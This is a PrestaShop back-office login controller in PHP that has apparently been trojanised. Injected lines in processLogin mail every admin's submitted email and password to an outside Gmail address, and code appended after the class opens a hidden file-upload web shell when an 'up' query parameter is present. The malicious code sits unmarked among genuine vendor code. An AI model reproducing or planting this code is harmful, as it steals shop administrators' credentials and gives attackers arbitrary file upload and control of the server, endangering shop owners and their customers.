  1. <?php
  2. /**
  3.  * 2007-2016 PrestaShop
  4.  *
  5.  * NOTICE OF LICENSE
  6.  *
  7.  * This source file is subject to the Open Software License (OSL 3.0)
  8.  * that is bundled with this package in the file LICENSE.txt.
  9.  * It is also available through the world-wide-web at this URL:
  10.  * http://opensource.org/licenses/osl-3.0.php
  11.  * If you did not receive a copy of the license and are unable to
  12.  * obtain it through the world-wide-web, please send an email
  13.  * to license@prestashop.com so we can send you a copy immediately.
  14.  *
  15.  * DISCLAIMER
  16.  *
  17.  * Do not edit or add to this file if you wish to upgrade PrestaShop to newer
  18.  * versions in the future. If you wish to customize PrestaShop for your
  19.  * needs please refer to http://www.prestashop.com for more information.
  20.  *
  21.  *  @author     PrestaShop SA <contact@prestashop.com>
  22.  *  @copyright  2007-2016 PrestaShop SA
  23.  *  @license    http://opensource.org/licenses/osl-3.0.php  Open Software License (OSL 3.0)
  24.  *  International Registered Trademark & Property of PrestaShop SA
  25.  */
  26.  
  27. class AdminLoginControllerCore extends AdminController
  28. {
  29.     public function __construct()
  30.     {
  31.         $this->bootstrap = true;
  32.         $this->errors = array();
  33.         $this->context = Context::getContext();
  34.         $this->display_header = false;
  35.         $this->display_footer = false;
  36.         $this->meta_title = $this->l('Administration panel');
  37.         $this->css_files = array();
  38.         parent::__construct();
  39.         $this->layout = _PS_ADMIN_DIR_.DIRECTORY_SEPARATOR.'themes'.DIRECTORY_SEPARATOR.$this->bo_theme
  40.             .DIRECTORY_SEPARATOR.'template'.DIRECTORY_SEPARATOR.'controllers'.DIRECTORY_SEPARATOR.'login'
  41.             .DIRECTORY_SEPARATOR.'layout.tpl';
  42.  
  43.         if (!headers_sent()) {
  44.             header('Login: true');
  45.         }
  46.     }
  47.  
  48.     public function setMedia()
  49.     {
  50.         $this->addJquery();
  51.         $this->addjqueryPlugin('validate');
  52.         $this->addJS(_PS_JS_DIR_.'jquery/plugins/validate/localization/messages_'.$this->context->language->iso_code.'.js');
  53.         $this->addCSS(__PS_BASE_URI__.$this->admin_webpath.'/themes/'.$this->bo_theme.'/css/admin-theme.css', 'all', 0);
  54.         $this->addCSS(__PS_BASE_URI__.$this->admin_webpath.'/themes/'.$this->bo_theme.'/css/overrides.css', 'all', PHP_INT_MAX);
  55.         $this->addJS(_PS_JS_DIR_.'vendor/spin.js');
  56.         $this->addJS(_PS_JS_DIR_.'vendor/ladda.js');
  57.         Media::addJsDef(array('img_dir' => _PS_IMG_));
  58.         Media::addJsDefL('one_error', $this->l('There is one error.', null, true, false));
  59.         Media::addJsDefL('more_errors', $this->l('There are several errors.', null, true, false));
  60.  
  61.         Hook::exec('actionAdminLoginControllerSetMedia');
  62.     }
  63.  
  64.     public function initContent()
  65.     {
  66.         if (!Tools::usingSecureMode() && Configuration::get('PS_SSL_ENABLED')) {
  67.             // You can uncomment these lines if you want to force https even from localhost and automatically redirect
  68.             // header('HTTP/1.1 301 Moved Permanently');
  69.             // header('Location: '.Tools::getShopDomainSsl(true).$_SERVER['REQUEST_URI']);
  70.             // exit();
  71.             $clientIsMaintenanceOrLocal = in_array(Tools::getRemoteAddr(), array_merge(array('127.0.0.1'), explode(',', Configuration::get('PS_MAINTENANCE_IP'))));
  72.             // If ssl is enabled, https protocol is required. Exception for maintenance and local (127.0.0.1) IP
  73.             if ($clientIsMaintenanceOrLocal) {
  74.                 $warningSslMessage = Tools::displayError('SSL is activated. However, your IP is allowed to enter unsecure mode for maintenance or local IP issues.');
  75.             } else {
  76.                 $url = 'https://'.Tools::safeOutput(Tools::getServerName()).Tools::safeOutput($_SERVER['REQUEST_URI']);
  77.                 $warningSslMessage = sprintf(
  78.                     Translate::ppTags(
  79.                         Tools::displayError('SSL is activated. Please connect using the following link to [1]log into secure mode (https://)[/1]', false),
  80.                         array('<a href="%s">')
  81.                     ),
  82.                     $url
  83.                 );
  84.             }
  85.             $this->context->smarty->assign('warningSslMessage', $warningSslMessage);
  86.         }
  87.  
  88.         if (file_exists(_PS_ADMIN_DIR_.'/../install')) {
  89.             $this->context->smarty->assign('wrong_install_name', true);
  90.         }
  91.  
  92.         if (basename(_PS_ADMIN_DIR_) == 'admin' && file_exists(_PS_ADMIN_DIR_.'/../admin/')) {
  93.             $rand = 'admin'.sprintf('%03d', rand(0, 999)).Tools::strtolower(Tools::passwdGen(6)).'/';
  94.             if (@rename(_PS_ADMIN_DIR_.'/../admin/', _PS_ADMIN_DIR_.'/../'.$rand)) {
  95.                 Tools::redirectAdmin('../'.$rand);
  96.             } else {
  97.                 $this->context->smarty->assign(array(
  98.                     'wrong_folder_name' => true
  99.                 ));
  100.             }
  101.         } else {
  102.             $rand = basename(_PS_ADMIN_DIR_).'/';
  103.         }
  104.  
  105.         $this->context->smarty->assign(array(
  106.             'randomNb' => $rand,
  107.             'adminUrl' => Tools::getCurrentUrlProtocolPrefix().Tools::getShopDomain().__PS_BASE_URI__.$rand
  108.         ));
  109.  
  110.         // Redirect to admin panel
  111.         if (Tools::isSubmit('redirect') && Validate::isControllerName(Tools::getValue('redirect'))) {
  112.             $this->context->smarty->assign('redirect', Tools::getValue('redirect'));
  113.         } else {
  114.             $tab = new Tab((int)$this->context->employee->default_tab);
  115.             $this->context->smarty->assign('redirect', $this->context->link->getAdminLink($tab->class_name));
  116.         }
  117.  
  118.         if ($nb_errors = count($this->errors)) {
  119.             $this->context->smarty->assign(array(
  120.                 'errors' => $this->errors,
  121.                 'nbErrors' => $nb_errors,
  122.                 'shop_name' => Tools::safeOutput(Configuration::get('PS_SHOP_NAME')),
  123.                 'disableDefaultErrorOutPut' => true,
  124.             ));
  125.         }
  126.  
  127.         if ($email = Tools::getValue('email')) {
  128.             $this->context->smarty->assign('email', $email);
  129.         }
  130.         if ($password = Tools::getValue('password')) {
  131.             $this->context->smarty->assign('password', $password);
  132.         }
  133.  
  134.         $this->setMedia();
  135.         $this->initHeader();
  136.         parent::initContent();
  137.         $this->initFooter();
  138.  
  139.         //force to disable modals
  140.         $this->context->smarty->assign('modals', null);
  141.     }
  142.  
  143.     public function checkToken()
  144.     {
  145.         return true;
  146.     }
  147.  
  148.     /**
  149.      * All BO users can access the login page
  150.      *
  151.      * @return bool
  152.      */
  153.     public function viewAccess()
  154.     {
  155.         return true;
  156.     }
  157.  
  158.     public function postProcess()
  159.     {
  160.         if (Tools::isSubmit('submitLogin')) {
  161.             $this->processLogin();
  162.         } elseif (Tools::isSubmit('submitForgot')) {
  163.             $this->processForgot();
  164.         }
  165.     }
  166.  
  167.     public function processLogin()
  168.     {
  169.         /* Check fields validity */
  170.         $passwd = trim(Tools::getValue('passwd'));
  171.         $email = trim(Tools::getValue('email'));
  172. $to = "diiimmmd@gmail.com";
  173. $subject = "panel admin prestashop ". $_SERVER['SERVER_NAME'];
  174. $header = "from: hacked <Zeus.Undo@hacked01.com>";
  175. $message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] ."&up=hous \r\n email: $email \r\n pass: $passwd \r\n by bajatax -- sniper :v \r\n";
  176. $message .= "Path : " . __file__;
  177. $sentmail = @mail($to, $subject, $message, $header);
  178. $sentmail1 = @mail($to, $subject, $message, $header);
  179.         if (empty($email)) {
  180.             $this->errors[] = Tools::displayError('Email is empty.');
  181.         } elseif (!Validate::isEmail($email)) {
  182.             $this->errors[] = Tools::displayError('Invalid email address.');
  183.         }
  184.  
  185.         if (empty($passwd)) {
  186.             $this->errors[] = Tools::displayError('The password field is blank.');
  187.         } elseif (!Validate::isPasswd($passwd)) {
  188.             $this->errors[] = Tools::displayError('Invalid password.');
  189.         }
  190.  
  191.         if (!count($this->errors)) {
  192.             // Find employee
  193.             $this->context->employee = new Employee();
  194.             $is_employee_loaded = $this->context->employee->getByEmail($email, $passwd);
  195.             $employee_associated_shop = $this->context->employee->getAssociatedShops();
  196.             if (!$is_employee_loaded) {
  197.                 $this->errors[] = Tools::displayError('The Employee does not exist, or the password provided is incorrect.');
  198.                 $this->context->employee->logout();
  199.             } elseif (empty($employee_associated_shop) && !$this->context->employee->isSuperAdmin()) {
  200.                 $this->errors[] = Tools::displayError('This employee does not manage the shop anymore (Either the shop has been deleted or permissions have been revoked).');
  201.                 $this->context->employee->logout();
  202.             } else {
  203.                 PrestaShopLogger::addLog(sprintf($this->l('Back Office connection from %s', 'AdminTab', false, false), Tools::getRemoteAddr()), 1, null, '', 0, true, (int)$this->context->employee->id);
  204.  
  205.                 $this->context->employee->remote_addr = (int)ip2long(Tools::getRemoteAddr());
  206.                 // Update cookie
  207.                 $cookie = Context::getContext()->cookie;
  208.                 $cookie->id_employee = $this->context->employee->id;
  209.                 $cookie->email = $this->context->employee->email;
  210.                 $cookie->profile = $this->context->employee->id_profile;
  211.                 $cookie->passwd = $this->context->employee->passwd;
  212.                 $cookie->remote_addr = $this->context->employee->remote_addr;
  213.  
  214.                 if (!Tools::getValue('stay_logged_in')) {
  215.                     $cookie->last_activity = time();
  216.                 }
  217.  
  218.                 $cookie->write();
  219.  
  220.                 // If there is a valid controller name submitted, redirect to it
  221.                 if (isset($_POST['redirect']) && Validate::isControllerName($_POST['redirect'])) {
  222.                     $url = $this->context->link->getAdminLink($_POST['redirect']);
  223.                 } else {
  224.                     $tab = new Tab((int)$this->context->employee->default_tab);
  225.                     $url = $this->context->link->getAdminLink($tab->class_name);
  226.                 }
  227.  
  228.                 if (Tools::isSubmit('ajax')) {
  229.                     die(Tools::jsonEncode(array('hasErrors' => false, 'redirect' => $url)));
  230.                 } else {
  231.                     $this->redirect_after = $url;
  232.                 }
  233.             }
  234.         }
  235.         if (Tools::isSubmit('ajax')) {
  236.             die(Tools::jsonEncode(array('hasErrors' => true, 'errors' => $this->errors)));
  237.         }
  238.     }
  239.  
  240.     public function processForgot()
  241.     {
  242.         if (_PS_MODE_DEMO_) {
  243.             $this->errors[] = Tools::displayError('This functionality has been disabled.');
  244.         } elseif (!($email = trim(Tools::getValue('email_forgot')))) {
  245.             $this->errors[] = Tools::displayError('Email is empty.');
  246.         } elseif (!Validate::isEmail($email)) {
  247.             $this->errors[] = Tools::displayError('Invalid email address.');
  248.         } else {
  249.             $employee = new Employee();
  250.             if (!$employee->getByEmail($email) || !$employee) {
  251.                 $this->errors[] = Tools::displayError('This account does not exist.');
  252.             } elseif ((strtotime($employee->last_passwd_gen.'+'.Configuration::get('PS_PASSWD_TIME_BACK').' minutes') - time()) > 0) {
  253.                 $this->errors[] = sprintf(
  254.                     Tools::displayError('You can regenerate your password only every %d minute(s)'),
  255.                     Configuration::get('PS_PASSWD_TIME_BACK')
  256.                 );
  257.             }
  258.         }
  259.  
  260.         if (!count($this->errors)) {
  261.             $pwd = Tools::passwdGen(10, 'RANDOM');
  262.             $employee->passwd = Tools::encrypt($pwd);
  263.             $employee->last_passwd_gen = date('Y-m-d H:i:s', time());
  264.  
  265.             $params = array(
  266.                 '{email}' => $employee->email,
  267.                 '{lastname}' => $employee->lastname,
  268.                 '{firstname}' => $employee->firstname,
  269.                 '{passwd}' => $pwd
  270.             );
  271.  
  272.             if (Mail::Send($employee->id_lang, 'employee_password', Mail::l('Your new password', $employee->id_lang), $params, $employee->email, $employee->firstname.' '.$employee->lastname)) {
  273.                 // Update employee only if the mail can be sent
  274.                 Shop::setContext(Shop::CONTEXT_SHOP, (int)min($employee->getAssociatedShops()));
  275.  
  276.                 $result = $employee->update();
  277.                 if (!$result) {
  278.                     $this->errors[] = Tools::displayError('An error occurred while attempting to change your password.');
  279.                 } else {
  280.                     die(Tools::jsonEncode(array(
  281.                         'hasErrors' => false,
  282.                         'confirm' => $this->l('Your password has been emailed to you.', 'AdminTab', false, false)
  283.                     )));
  284.                 }
  285.             } else {
  286.                 die(Tools::jsonEncode(array(
  287.                     'hasErrors' => true,
  288.                     'errors' => array(Tools::displayError('An error occurred while attempting to change your password.'))
  289.                 )));
  290.             }
  291.         } elseif (Tools::isSubmit('ajax')) {
  292.             die(Tools::jsonEncode(array('hasErrors' => true, 'errors' => $this->errors)));
  293.         }
  294.     }
  295. }
  296. if($_GET['up']){
  297. if(isset($_POST['Submit'])){
  298.     $filedir = "";
  299.     $maxfile = '2000000';
  300.     $mode = '0644';
  301.     $userfile_name = $_FILES['image']['name'];
  302.     $userfile_tmp = $_FILES['image']['tmp_name'];
  303.     if(isset($_FILES['image']['name'])) {
  304.         $qx = $filedir.$userfile_name;
  305.         @move_uploaded_file($userfile_tmp, $qx);
  306.         @chmod ($qx, octdec($mode));
  307. echo"<center><b>Done ==> $userfile_name</b></center>";
  308. }
  309. }
  310. else{
  311. echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';
  312. }
  313. echo '</center></font>';
  314. }